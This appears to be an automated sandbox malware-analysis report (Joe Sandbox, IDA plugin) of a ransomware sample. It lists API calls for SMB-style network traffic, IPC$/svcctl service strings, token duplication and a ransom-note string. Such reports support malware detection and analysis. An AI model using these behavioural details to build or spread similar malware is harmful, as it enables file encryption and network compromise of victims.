                                                • Part of subcall function 04BF1EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF1ED2
                                                • Part of subcall function 04BF1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1EDB
                                                • Part of subcall function 04BF1EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF943A), ref: 04BF1F1F
                                                • Part of subcall function 04BF1EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1F22
                                                • Part of subcall function 04BF1EB9: htons.WS2_32(?), ref: 04BF1F41
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF206D
                                                • Part of subcall function 04BF2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2076
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04BF943A), ref: 04BF209C
                                                • Part of subcall function 04BF2054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF209F
                                                • Part of subcall function 04BF2054: htons.WS2_32(?), ref: 04BF20BC
                                                • Part of subcall function 04BF2054: send.WS2_32(?,00000000,?,00000000), ref: 04BF2131
                                                • Part of subcall function 04BF2054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2148
                                                • Part of subcall function 04BF2054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF2168
                                                • Part of subcall function 04BF2054: HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF216F
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04BF4E76
                                                • Part of subcall function 04BF4E60: HeapAlloc.KERNEL32(00000000), ref: 04BF4E79
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF4F2A
                                                • Part of subcall function 04BF4E60: HeapFree.KERNEL32(00000000), ref: 04BF4F2D
                                                • Part of subcall function 04BF4E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04BF4F32
                                                • Part of subcall function 04BF4E60: HeapFree.KERNEL32(00000000), ref: 04BF4F35
                                              • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04BF51D3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF51DC
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,00000068,771AF380,?,77735E70,?,04BF51F9,?,?,?), ref: 04BF4F56
                                                • Part of subcall function 04BF4F43: HeapAlloc.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF4F5D
                                                • Part of subcall function 04BF4F43: rand.MSVCRT ref: 04BF4F86
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,?,04BF51F9,?,00000000,?,04BF51F9,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04BF4FF7
                                                • Part of subcall function 04BF4F43: HeapFree.KERNEL32(00000000), ref: 04BF4FFE
                                                • Part of subcall function 04BF4F43: GetProcessHeap.KERNEL32(00000008,00000000,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04BF51F9,?,?,?), ref: 04BF5007
                                                • Part of subcall function 04BF4F43: HeapFree.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF500E
                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04BF5205
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF5208
                                              • rand.MSVCRT ref: 04BF521B
                                              • rand.MSVCRT ref: 04BF5226
                                              • rand.MSVCRT ref: 04BF522F
                                              • sprintf.MSVCRT ref: 04BF5246
                                              • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5252
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5255
                                              • sprintf.MSVCRT ref: 04BF52AB
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04BF5308
                                              • HeapFree.KERNEL32(00000000), ref: 04BF530B
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5316
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5319
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04BF5324
                                              • HeapFree.KERNEL32(00000000), ref: 04BF5327
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                              • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                              • API String ID: 1576125627-3210642070
                                              • Opcode ID: 6485f7062ec0746e83bdd7587b833eabfcf0c51be4991f2901cd2a0047017428
                                              • Instruction ID: ea92822d5d338bc73096b205d093177598be92893af1b57d60a18dc40efc08d7
                                              • Opcode Fuzzy Hash: 6485f7062ec0746e83bdd7587b833eabfcf0c51be4991f2901cd2a0047017428
                                              • Instruction Fuzzy Hash: 5B518F7190020DBBDF119FA8DC44FEE7BAAEF49304F044095FA49A7192CB75E919CB60
                                              APIs
                                              • memset.MSVCRT ref: 04BF862D
                                                • Part of subcall function 04BF8147: memset.MSVCRT ref: 04BF8160
                                                • Part of subcall function 04BF8147: GetVersionExW.KERNEL32(?,?,?,771B0F10), ref: 04BF8179
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF8645
                                              • Process32FirstW.KERNEL32 ref: 04BF8666
                                              • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 04BF86A0
                                              • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 04BF86B9
                                              • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 04BF86DF
                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04BF8708
                                              • memset.MSVCRT ref: 04BF871E
                                              • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04BF8738
                                              • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04BF8767
                                              • CloseHandle.KERNEL32(?), ref: 04BF87A2
                                              • CloseHandle.KERNEL32(?), ref: 04BF87A8
                                              • Process32NextW.KERNEL32(?,?), ref: 04BF87BA
                                              • GetLastError.KERNEL32 ref: 04BF87CA
                                              • CloseHandle.KERNEL32(?), ref: 04BF87D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                              • String ID: @
                                              • API String ID: 4137997400-2766056989
                                              • Opcode ID: 33d82a01e3171496966b636c14b05010161e71422641a0b5cee41351ac68a8c1
                                              • Instruction ID: 6254f9eabb8b961172f09f939799e2873bfa5b7c6f4aa3dce49ca7a6a8a8988b
                                              • Opcode Fuzzy Hash: 33d82a01e3171496966b636c14b05010161e71422641a0b5cee41351ac68a8c1
                                              • Instruction Fuzzy Hash: 0A514C71608301AFD710AF25DC49E6FBBE8FB89754F040A6DF699D2190D730E909CBA2
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF6118
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04BF6136
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF6170
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04BF6191
                                              • memset.MSVCRT ref: 04BF61C8
                                              • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 04BF61E2
                                              • StrCatW.SHLWAPI(?,?), ref: 04BF61EE
                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04BF621B
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 04BF6226
                                              • LocalFree.KERNEL32(?), ref: 04BF622F
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04BF6236
                                              Strings
                                              • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 04BF61D6
                                              • Readme.txt, xrefs: 04BF6107
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                              • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
                                              • API String ID: 1343258794-115798760
                                              • Opcode ID: 75869dd76835a1787800f8b3cb8b5a9002c396a63e7c97e5ce45edee4935c7eb
                                              • Instruction ID: 7ec4d9774757c417071a59c4d41fd70947f8f42b2fa51690295250e15357e958
                                              • Opcode Fuzzy Hash: 75869dd76835a1787800f8b3cb8b5a9002c396a63e7c97e5ce45edee4935c7eb
                                              • Instruction Fuzzy Hash: 0B316376500108AFDB21DBA5DD49D9B7BFDEB49700B0485A6FA0AD3040DB35FA59CBB0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,771AF380,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04BF3089
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3092
                                              • GetProcessHeap.KERNEL32(00000008,0000003F,771ADF60,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF30A4
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF30A7
                                              • htons.WS2_32(0000003B), ref: 04BF30BF
                                              • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04BF30F7
                                              • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04BF310D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3127
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF312E
                                              • memcpy.MSVCRT ref: 04BF3144
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3153
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF315A
                                              • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3165
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF316C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 317911368-0
                                              • Opcode ID: 701983b0dd25650b27fd01645dea28f20c9a57eee38b54576f5bb11b76c83cf6
                                              • Instruction ID: 37eb830ebed707788ca38f1790852ec2a5ed1e5ff4b8474fbbe38dd24fd35cdc
                                              • Opcode Fuzzy Hash: 701983b0dd25650b27fd01645dea28f20c9a57eee38b54576f5bb11b76c83cf6
                                              • Instruction Fuzzy Hash: 7C318D71600305BBEF105FE4DC49F6A7BADEF88300F14509AFA099B280DB759954DB64
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 04BF8944
                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04BF894B
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 04BF896D
                                              • GetLastError.KERNEL32 ref: 04BF897E
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 04BF898F
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 04BF89A8
                                              • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 04BF89BF
                                              • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 04BF89D2
                                              • GetLastError.KERNEL32 ref: 04BF89FD
                                              • GlobalFree.KERNEL32(00000000), ref: 04BF8A00
                                              • GetLastError.KERNEL32 ref: 04BF8A08
                                              • CloseHandle.KERNEL32(?), ref: 04BF8A0F
                                              • GetLastError.KERNEL32 ref: 04BF8A17
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                              • String ID:
                                              • API String ID: 1283781744-0
                                              • Opcode ID: 03413a6dc418f7d2b86699f7fa76706f54538ca89e0ccd0fe133fd1662585c53
                                              • Instruction ID: 8bfa1d92d7629f923559dbc048a2befbf3ea31b0574332f1a9e1419b0bce7a6a
                                              • Opcode Fuzzy Hash: 03413a6dc418f7d2b86699f7fa76706f54538ca89e0ccd0fe133fd1662585c53
                                              • Instruction Fuzzy Hash: 9E317131900215FFEF10AFA4DC88B9DBF78EF44740F1081A6EA0AE2150D779AE59DB65
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04BF2F73
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2F7C
                                              • GetProcessHeap.KERNEL32(00000008,?,7675C650), ref: 04BF2F97
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2F9A
                                              • htons.WS2_32(424D53FE), ref: 04BF2FBA
                                              • memcpy.MSVCRT ref: 04BF300B
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF301B
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF3032
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF3048
                                              • HeapFree.KERNEL32(00000000), ref: 04BF304F
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF305A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3061
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 2433318192-0
                                              • Opcode ID: e96d3fd1656ab1897359d6c59370e64529393bb11fb564c5975b653b68c6f94d
                                              • Instruction ID: 8760f1c3ad74886e24e3f6eb2898972abd7b6e9b7b10f135dba1c3262c882d8d
                                              • Opcode Fuzzy Hash: e96d3fd1656ab1897359d6c59370e64529393bb11fb564c5975b653b68c6f94d
                                              • Instruction Fuzzy Hash: F7319C75900245ABEF509FA5DC88B9A7BBCFF48700F05509AFE09EB241D779D904CB64
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 04BF32CB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF32D4
                                              • GetProcessHeap.KERNEL32(00000008,?,771AF380), ref: 04BF32EF
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF32F2
                                              • htons.WS2_32(?), ref: 04BF330F
                                              • memcpy.MSVCRT ref: 04BF333D
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3350
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF3368
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF337B
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3382
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF338D
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3394
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 2433318192-0
                                              • Opcode ID: d79d6b8f2e783946b1baddfa5c058883f9180af916887f527335405c392090bb
                                              • Instruction ID: 1ed2abc3e1df70423080b129dd910f3d85dc962652c81dd87f8ca58f85d5dd34
                                              • Opcode Fuzzy Hash: d79d6b8f2e783946b1baddfa5c058883f9180af916887f527335405c392090bb
                                              • Instruction Fuzzy Hash: 89312D7190020ABBEF009FA5DC45AAE7BBCEF49710F148056FA09EB291DB78DD05DB60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,771AF380), ref: 04BF41FD
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4204
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40F8
                                                • Part of subcall function 04BF40E3: HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40FB
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF4148
                                                • Part of subcall function 04BF40E3: HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF414B
                                                • Part of subcall function 04BF40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF4184
                                                • Part of subcall function 04BF40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04BF423E,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF41BC
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?), ref: 04BF41CB
                                                • Part of subcall function 04BF40E3: HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41CE
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41D7
                                                • Part of subcall function 04BF40E3: HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41DA
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04BF4287
                                              • HeapFree.KERNEL32(00000000), ref: 04BF428E
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04BF42D9
                                              • HeapFree.KERNEL32(00000000), ref: 04BF42E0
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04BF4336
                                              • HeapFree.KERNEL32(00000000), ref: 04BF433D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,771AF380,?,00000000,00000100,?), ref: 04BF4399
                                              • HeapFree.KERNEL32(00000000), ref: 04BF43A0
                                              • memset.MSVCRT ref: 04BF43AE
                                                • Part of subcall function 04BF3D0D: rand.MSVCRT ref: 04BF3EC3
                                                • Part of subcall function 04BF3D0D: memset.MSVCRT ref: 04BF3EFC
                                                • Part of subcall function 04BF3D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04BF3F38
                                                • Part of subcall function 04BF3D0D: htons.WS2_32(?), ref: 04BF3F5C
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 04BF466C
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4673
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,771AF380,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?), ref: 04BF3D2B
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D34
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04BF3D46
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D49
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3D63
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D66
                                                • Part of subcall function 04BF3D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?,?), ref: 04BF3E5B
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3E65
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3E68
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                              • String ID:
                                              • API String ID: 2891003447-0
                                              • Opcode ID: d768231355ccef85832433f92ffe3c65af47436a77496ce2799e2fdeed20b965
                                              • Instruction ID: 6c6c811d0b7cbbf1199b85b5f3432c0a874d891d05be7782f2164a60936c6e50
                                              • Opcode Fuzzy Hash: d768231355ccef85832433f92ffe3c65af47436a77496ce2799e2fdeed20b965
                                              • Instruction Fuzzy Hash: C9F190B1904745AFDB11CF94CC40AABBBB7FF49304F088499EA49AB351C3B5E919CB90
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04BF2E32
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2E3B
                                              • GetProcessHeap.KERNEL32(00000008,00000048,771AF380), ref: 04BF2E4D
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2E50
                                              • htons.WS2_32(00000044), ref: 04BF2E68
                                              • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04BF2EF3
                                              • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04BF2F0B
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF2F31
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2F38
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2F43
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2F4A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID:
                                              • API String ID: 1780562090-0
                                              • Opcode ID: 22fadb0649eba01d42966bf6bb1bf5624a6a157af7b0eda53be2b2b704ba70be
                                              • Instruction ID: 57581652c8f179ca43b5b9979486da06c2e9258c06d98e5c883004457d349942
                                              • Opcode Fuzzy Hash: 22fadb0649eba01d42966bf6bb1bf5624a6a157af7b0eda53be2b2b704ba70be
